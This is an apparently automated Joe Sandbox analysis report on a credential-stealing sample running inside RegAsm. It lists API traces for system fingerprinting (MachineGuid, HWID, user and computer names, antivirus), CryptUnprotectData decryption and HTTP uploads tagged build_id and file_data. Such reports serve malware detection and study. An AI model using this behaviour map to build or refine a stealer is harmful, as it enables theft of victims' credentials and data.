                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                • String ID: /
                                                                                                                                                                                                • API String ID: 2868853201-4001269591
                                                                                                                                                                                                • Opcode ID: f86d6cc1372bb5890f5c10c94293cb2d0650925ee5e8fd924d0eb1fd141a9395
                                                                                                                                                                                                • Instruction ID: 0fc2b7e35f4d6114d8ae3e9005ea3697fa52aa721323e90e6314f7b8594f7607
                                                                                                                                                                                                • Opcode Fuzzy Hash: f86d6cc1372bb5890f5c10c94293cb2d0650925ee5e8fd924d0eb1fd141a9395
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86311CB5901219EFDB00EFE6C985AEEBBB9FF48304F10446EE505B3281C7785A44CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F315
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F350
                                                                                                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 0040F361
                                                                                                                                                                                                • Process32Next.KERNEL32(?,00000128), ref: 0040F3C9
                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 0040F3D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 599723951-0
                                                                                                                                                                                                • Opcode ID: 4f43f0c7911a1154bfe646faa6a16fe23ed6cdbbcadd1926e04f810d2c196b28
                                                                                                                                                                                                • Instruction ID: c4fd9f573cf2a468e9983291a0c5dbd1645898d3a40b29cc7e5dd950d5d90eba
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f43f0c7911a1154bfe646faa6a16fe23ed6cdbbcadd1926e04f810d2c196b28
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A213EB1A00118EBCB00EFA6C955AEEBBB9BF58304F00447FE405F3291D7784A08CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoCreateInstance.OLE32(00426FE8,00000000,00000001,004253C8,00000000,?), ref: 0040F731
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0040F73F
                                                                                                                                                                                                • _wtoi64.MSVCRT ref: 0040F781
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0040F796
                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040F799
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1817501562-0
                                                                                                                                                                                                • Opcode ID: d3a1f175e1685076b102b1b7f0775a54b8c020bb750b008cfe05fffd5a1c668d
                                                                                                                                                                                                • Instruction ID: 59552c5b9146f1189dd7842dde150404ed07699bec92d6bc658d66da47dd67c6
                                                                                                                                                                                                • Opcode Fuzzy Hash: d3a1f175e1685076b102b1b7f0775a54b8c020bb750b008cfe05fffd5a1c668d
                                                                                                                                                                                                • Instruction Fuzzy Hash: AB11AF34A04208BFCB10CBA4D848B9E7FB9EF85314F1480B9E804EB290C7759546CB15
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ), ref: 0040EC92
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040EC99
                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040ECA8
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040ECC6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 362916592-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoSystemwsprintf
                                                                                                                                                                                                • String ID: DUB
                                                                                                                                                                                                • API String ID: 2452939696-3620500899
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406314
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?), ref: 0040632C
                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040634A
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2068576380-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041623D,00425507), ref: 0040EBC6
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,0041623D,00425507), ref: 0040EBCD
                                                                                                                                                                                                • GetUserNameA.ADVAPI32(00000000,?), ref: 0040EBE1
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1206570057-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004043D4
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404443
                                                                                                                                                                                                  • Part of subcall function 0040FD97: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040FDBB
                                                                                                                                                                                                  • Part of subcall function 0040FD97: GetProcessHeap.KERNEL32(00000000,?,?,00404437,?,?,?,?,?,?), ref: 0040FDC8
                                                                                                                                                                                                  • Part of subcall function 0040FD97: HeapAlloc.KERNEL32(00000000,?,00404437,?,?,?,?,?,?), ref: 0040FDCF
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,004249DF,004249DB,004249D3,004249CF,004249CE), ref: 004044C6
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044E6
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040460B
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404645
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404669
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00424A98,00000000,?,?,00000000), ref: 00404B79
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404B8B
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B9D
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00404BA4
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404BB6
                                                                                                                                                                                                • memcpy.MSVCRT ref: 00404BC9
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BE0
                                                                                                                                                                                                • memcpy.MSVCRT ref: 00404BEA
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404BFB
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404C14
                                                                                                                                                                                                • memcpy.MSVCRT ref: 00404C21
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404C36
                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C47
                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C6E
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CF0
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00404D08
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00404D13
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00404D23
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                                                                                                                                • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                • API String ID: 2658035217-3618031631
                                                                                                                                                                                                • Opcode ID: 74230ea3418a17fe7acd45192ab923381b60e63671642810837e76700d48b455
                                                                                                                                                                                                • Instruction ID: 83ec78a3498141f7689482851a51ba72a7f8a481cb099c92ac8b0ea39d2d89c8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 74230ea3418a17fe7acd45192ab923381b60e63671642810837e76700d48b455
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA6242B1800148EADB05EBE2C956EEEBBB8AF19304F1444AFE541731C2DB785B18DB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                control_flow_graph 359 405183-405252 _EH_prolog call 40e949 call 403a76 call 40e912 * 5 call 40eb3c InternetOpenA StrCmpCA 376 405254 359->376 377 405256-405259 359->377 376->377 378 405924-40594a InternetCloseHandle call 40eb3c call 40628e 377->378 379 40525f-4053dd call 40fb47 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40ea17 call 40e9d0 call 40e97d * 2 InternetConnectA 377->379 389 40594c-405979 call 40e986 call 40ea8b call 40e9d0 call 40e97d 378->389 390 40597e-4059eb call 40fa7f * 2 call 40e97d * 4 call 401061 call 40e97d 378->390 379->378 459 4053e3-405414 HttpOpenRequestA 379->459 389->390 460 40541a-40541c 459->460 461 40591b-40591e InternetCloseHandle 459->461 462 405434-4058c1 call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 402101 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40eb3c lstrlenA call 40eb3c lstrlenA GetProcessHeap HeapAlloc call 
40eb3c lstrlenA call 40eb3c memcpy call 40eb3c lstrlenA call 40eb3c * 2 lstrlenA memcpy call 40eb3c lstrlenA call 40eb3c HttpSendRequestA 460->462 463 40541e-40542e InternetSetOptionA 460->463 461->378 624 4058fd-405912 InternetReadFile 462->624 463->462 625 4058c3-4058c8 624->625 626 405914-405915 InternetCloseHandle 624->626 625->626 627 4058ca-4058f8 call 40ea8b call 40e9d0 call 40e97d 625->627 626->461 627->624
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00405188
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405233
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053D2
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405409
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00424B20,00000000), ref: 00405818
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405829
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405833
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040583A
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040584B
                                                                                                                                                                                                • memcpy.MSVCRT ref: 0040585C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040586D
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405886
                                                                                                                                                                                                • memcpy.MSVCRT ref: 0040588F
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004058A2
                                                                                                                                                                                                • HttpSendRequestA.WININET(?,00000000,00000000), ref: 004058B6
                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000000C7,?), ref: 0040590A
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00405915
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040542E
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 0040591E
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00405927
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 0040524A
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                • String ID: "$"$"$)$------$------$------$------$build_id$mode
                                                                                                                                                                                                • API String ID: 2237346945-290892794
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00413624
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EC27: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042548E), ref: 0040EC35
                                                                                                                                                                                                  • Part of subcall function 0040EC27: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042548E), ref: 0040EC3C
                                                                                                                                                                                                  • Part of subcall function 0040EC27: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042548E), ref: 0040EC48
                                                                                                                                                                                                  • Part of subcall function 0040EC27: wsprintfA.USER32 ref: 0040EC73
                                                                                                                                                                                                  • Part of subcall function 0040F462: memset.MSVCRT ref: 0040F488
                                                                                                                                                                                                  • Part of subcall function 0040F462: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,0042548E,?,?,00000000), ref: 0040F4A4
                                                                                                                                                                                                  • Part of subcall function 0040F462: RegQueryValueExA.KERNEL32(0042548E,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040F4C3
                                                                                                                                                                                                  • Part of subcall function 0040F462: CharToOemA.USER32(?,?), ref: 0040F4E0
                                                                                                                                                                                                  • Part of subcall function 0040F4EF: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F500
                                                                                                                                                                                                  • Part of subcall function 0040F52A: _EH_prolog.MSVCRT ref: 0040F52F
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F552
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F584
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F5C7
                                                                                                                                                                                                  • Part of subcall function 0040F52A: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F5CE
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00425538,00000000,?,00000000,00000000,?,HWID: ,00000000,?,0042552C,00000000), ref: 00413952
                                                                                                                                                                                                  • Part of subcall function 0040FFEC: OpenProcess.KERNEL32(00000410,00000000,b9A), ref: 00410004
                                                                                                                                                                                                  • Part of subcall function 0040FFEC: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041001F
                                                                                                                                                                                                  • Part of subcall function 0040FFEC: CloseHandle.KERNEL32(00000000), ref: 00410026
                                                                                                                                                                                                  • Part of subcall function 0040F698: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory), ref: 0040F6AC
                                                                                                                                                                                                  • Part of subcall function 0040F698: HeapAlloc.KERNEL32(00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F6B3
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: _EH_prolog.MSVCRT ref: 0040F7B0
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000), ref: 0040F7C0
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,0042555C), ref: 0040F7D1
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: CoCreateInstance.OLE32(00427238,00000000,00000001,00427168,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000), ref: 0040F7EB
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,0042555C,00000000), ref: 0040F821
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: VariantInit.OLEAUT32(?), ref: 0040F87C
                                                                                                                                                                                                  • Part of subcall function 0040F934: _EH_prolog.MSVCRT ref: 0040F939
                                                                                                                                                                                                  • Part of subcall function 0040F934: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040F949
                                                                                                                                                                                                  • Part of subcall function 0040F934: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040F95A
                                                                                                                                                                                                  • Part of subcall function 0040F934: CoCreateInstance.OLE32(00427238,00000000,00000001,00427168,?,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040F974
                                                                                                                                                                                                  • Part of subcall function 0040F934: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000), ref: 0040F9AA
                                                                                                                                                                                                  • Part of subcall function 0040F934: VariantInit.OLEAUT32(?), ref: 0040F9F9
                                                                                                                                                                                                  • Part of subcall function 0040EBEC: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,00413BEE,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000), ref: 0040EBF8
                                                                                                                                                                                                  • Part of subcall function 0040EBEC: HeapAlloc.KERNEL32(00000000,?,?,00413BEE,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ), ref: 0040EBFF
                                                                                                                                                                                                  • Part of subcall function 0040EBEC: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040EC13
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041623D,00425507), ref: 0040EBC6
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: HeapAlloc.KERNEL32(00000000,?,?,?,0041623D,00425507), ref: 0040EBCD
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: GetUserNameA.ADVAPI32(00000000,?), ref: 0040EBE1
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040F402
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F40D
